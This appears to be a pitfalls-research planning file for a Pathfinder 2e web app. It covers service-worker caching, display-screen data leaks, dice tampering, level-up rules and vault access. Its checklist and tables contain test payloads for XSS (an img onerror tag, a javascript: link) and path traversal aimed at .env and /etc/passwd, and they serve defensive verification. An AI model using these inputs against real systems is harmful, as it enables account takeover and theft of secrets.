Translation lookup on every character read (existing) Slow character sheet load Pre-cache on seed, batch missing on load (already in CONCERNS.md) 50+ unique items per character
SW Cache for authenticated API responses Stale data, leak between users Don't cache auth responses in Cache API First multi-user device

Security Mistakes

Mistake Risk Prevention
Display-screen authenticated as GM Player at table opens DevTools, sees GM-only data Issue display-only short-lived token; server-side filter GM data per channel
Markdown chat with raw HTML Account takeover via injected <img onerror> react-markdown without rehype-raw, urlTransform, no dangerouslySetInnerHTML
Client-rolled dice broadcast as authoritative Players spoof crits All rolls server-side with crypto.randomInt, persist seed
Vault path from wikilink not sanitized Read of /etc/passwd or .env Resolve+verify path starts with vault root; whitelist extensions
JWT in localStorage XSS-readable Stolen token Already a known risk; mitigate via CSP, sanitize all user-rendered content. Future: HttpOnly cookie + CSRF
Level-up endpoint accepts arbitrary level value Player jumps from level 4 to level 20 Server validates level == currentLevel + 1; level-up requires GM approval flag if going up multiple
Push notification body contains sensitive data (HP, location) Notification visible on lock screen leaks info Generic notification body ("Eine Aktion erwartet dich"), details only after app open
Unrestricted vault file size read OOM via 1GB markdown file Cap read at 5MB, refuse larger; report file too large gracefully
Display URL shareable Anyone with URL sees the battle Display URL contains short-lived token, expires when battle ends

UX Pitfalls

Pitfall User Impact Better Approach
Push permission prompt on first load User reflexively denies → stuck on denied Ask after explicit user opt-in tap, show why
"Update available" banner during active battle Disrupts session if reload triggered Suppress during active battle; queue for after
Level-up UI loses state on accidental tab close Player redoes 20 minutes of choices Persist wizard state every step; reload resumes
Dice roll result appears in chat but page is on different tab Player misses the outcome Service Worker push + tab title flash + sound (opt-in)
Display screen shows last-frame after disconnect GM thinks display is fine, players see frozen state Disconnect overlay on display screen with reconnect indicator
Vault note rendering shows raw [[wikilinks]] on parse failure Player sees broken syntax Graceful fallback: render as text + warning icon, not as broken markdown
Wake lock on always Phone overheats, battery drains Wake lock only during active turn; release on turn end
Boost UI accepts duplicate boost in same set Player applies all 4 to STR Greyed out / disabled state with tooltip explaining why
Cached character sheet offline shows old HP Player thinks they have HP they don't Mark as "Offline — letzte Aktualisierung vor X Min"

"Looks Done But Isn't" Checklist

Things that appear complete in dev but fail in real use.

  • PWA Install: Often missing maskable icons, splash screens, and apple-touch-icon — verify on real iOS + Android, not just Lighthouse
  • Web Push: Often missing 410-Gone cleanup — verify expired subs are pruned by sending a test push to a re-installed browser
  • Offline mode: Often missing offline auth fallback — verify cold-load on airplane mode shows app, not login error
  • Service Worker update: Often missing manual update prompt — verify deploy of new version doesn't auto-reload mid-session
  • Display screen: Often leaks GM data via unfiltered WebSocket frames — verify with socket.onAny(console.log) in incognito
  • Dice rolls: Often computed client-side — verify server-side roll by intercepting the fetch and changing the result; UI must reject
  • Chat markdown: Often allows javascript: URLs — verify [click](javascript:alert(1)) is neutralized
  • Level-up boost: Often missing 18-cap rule — verify boosting a stat at 18+ adds +1, not +2
  • Level-up undo: Often loses dependent feats — verify retraining a prereq feat surfaces broken downstream feats
  • Skill increase: Often loses history — verify undo of a level-15 increase knows which skill was chosen
  • Wikilink resolution: Often picks first match silently — verify ambiguous links are surfaced
  • Embed loops: Often crash on cyclic vault — verify with a deliberately cyclic test vault
  • Path traversal: Often allows .. — verify ?path=../../server/.env is rejected
  • Reconnect: Often loses missed messages — verify chat sent during a 30s disconnect appears after reconnect
  • Push payload: Often contains sensitive data — verify lock-screen notification doesn't leak HP/location
  • Backups: Often missing for VAPID keys + JWT_SECRET — verify they're in the .env.example doc and the deployment runbook

Recovery Strategies

When pitfalls slip through, here's how to recover.

Pitfall Recovery Cost Recovery Steps
VAPID key lost / rotated HIGH Notify all users; ask each to disable + re-enable notifications in settings (resubscribes); accept silent failure for users who don't act
Cache leaks user data across logins MEDIUM Force SW unregister via remote-config flag; client clears all caches on next load; bump SW version to invalidate; rotate JWT secret if data leak suspected
Level-up corrupted character (boost cap or feat dep) HIGH Append-only history table is the lifeline: replay history with corrected logic; if no history, manual GM correction via admin UI
Display screen showed GM data HIGH Audit server logs for affected battles; rotate display tokens; review WebSocket payloads with a recorded session capture
Cheated dice roll detected post-hoc MEDIUM Rolls persisted server-side: GM can review log, retroactively correct the affected encounter
Reconnect lost chat message LOW REST endpoint since=lastSeenId lets client refetch on reconnect; user can scroll back
SW cached old broken JS that breaks app MEDIUM Add a /api/health/version check; if returned version differs from SW-cached version + threshold, force unregister + reload
Wikilink resolution broken across vault rename LOW Re-index vault on detection; show "linked notes have moved" warning
Embed loop hung the tab LOW Hard reload; future loads use cycle detection (one-time fix)

Pitfall-to-Phase Mapping

How roadmap phases should address these pitfalls.

Pitfall Prevention Phase Verification
1. SW cache leaks user data PWA Multi-user shared device test passes
2. Mid-session SW force update PWA Deploy during active local battle test — no reload
3. iOS push silent failure PWA iOS PWA install + receive-push test on real device
4. VAPID key loss PWA .env.example documents key persistence; backup runbook exists
5. Display screen GM-data leak Battle-Multi-Screen DevTools-on-display test sees no GM-only fields
6. Client-side dice tampering Dice/Chat Forge a result client-side, server rejects
7. Markdown chat XSS Dice/Chat Inject <img onerror> and [click](javascript:...), both neutralized
8. Boost 18-cap Level-Up Unit test: boost STR 18 → STR 19 (not 20)
9. Recompute side effects Level-Up Test: level-up at low HP doesn't reset HP to max
10. Feat retrain orphans Level-Up Retrain prereq feat → dependent feats flagged
11. Skill increase history Level-Up Test: undo level-15 increase knows which skill
12. Wikilink ambiguity Obsidian Test vault with two same-basename notes; ambiguity surfaced
13. Embed loops Obsidian Cyclic vault test renders without hang
14. Vault path traversal Obsidian ?path=../../etc/passwd rejected
15. Socket.io message ordering Battle-Multi-Screen + Dice/Chat (cross-cutting) 30s disconnect test: missed events recovered
16. Cascading deletes All phases adding tables Schema review: every onDelete documented
17. Per-event JWT overload Cross-cutting (touched in every event-adding phase) Profiler shows JWT verify count = connection count, not event count
18. WebSocket room leaks Battle-Multi-Screen Memory profile over 24h shows no monotonic growth
19. Mobile sleep / push wakeup PWA / Mobile-First polish Push tap deep-link reaches correct page on cold start
20. Reconnect storm Battle-Multi-Screen + PWA Wi-Fi flap test with 5 clients; staggered reconnect
21. Manifest icon traps PWA Install on real iOS + Android; icons render correctly
22. Chat/roll index Dice/Chat EXPLAIN ANALYZE on paginated query shows index use
23. Offline auth fallback PWA Airplane mode cold load shows app, not login error
24. Display aspect ratio Battle-Multi-Screen Test on actual table screen
25. GM bulk-action footgun GM-Live-Tools Destructive action requires confirmation; undo works

Cross-Cutting: Phases that Cannot Be Skipped Without Pain

Three patterns must be present in every phase of this milestone:

  1. WebSocket discipline. Each new event needs: server-side validation → server-side persist (if historical) → broadcast (if needed) → client-side reconcile-on-reconnect. Gateway is the bottleneck — make it boringly consistent.

  2. PostgreSQL referential thinking. Each new table needs: explicit onDelete decision, composite indexes for query patterns, transaction wrapping for multi-table writes. The CharactersService (1454 lines, no tests, no transactions) is the cautionary tale.

  3. Test coverage on critical paths. The codebase has zero tests today. Every pitfall above is detectable by a test. The level-up math, the dice parser, the wikilink resolver, the path-traversal guard — these are ALL pure functions or near-pure functions. Test them. The death-spiral logic in HP/Dying/Wounded is already a flagged risk in CONCERNS.md; level-up adds another such mechanism. Don't ship pitfall-prone code with no test net.


Sources

PWA / Service Worker / Cache:

iOS Web Push:

Web Push / VAPID:

Wake Lock / Battery:

Socket.io:

PF2e Rules:

Obsidian / Wikilinks:

Markdown XSS:

Prisma / Postgres:

Internal context:

  • .planning/PROJECT.md
  • .planning/codebase/CONCERNS.md (HP/Dying race, oversized service, missing tests, gateway auth minimal)
  • .planning/codebase/TESTING.md (zero test coverage today — directly motivates the cross-cutting test discipline above)

Pitfalls research for: Dimension47 milestone — PWA + multi-screen battle + extended Socket.io + Obsidian read-only vault + full PF2e Level-Up Researched: 2026-04-27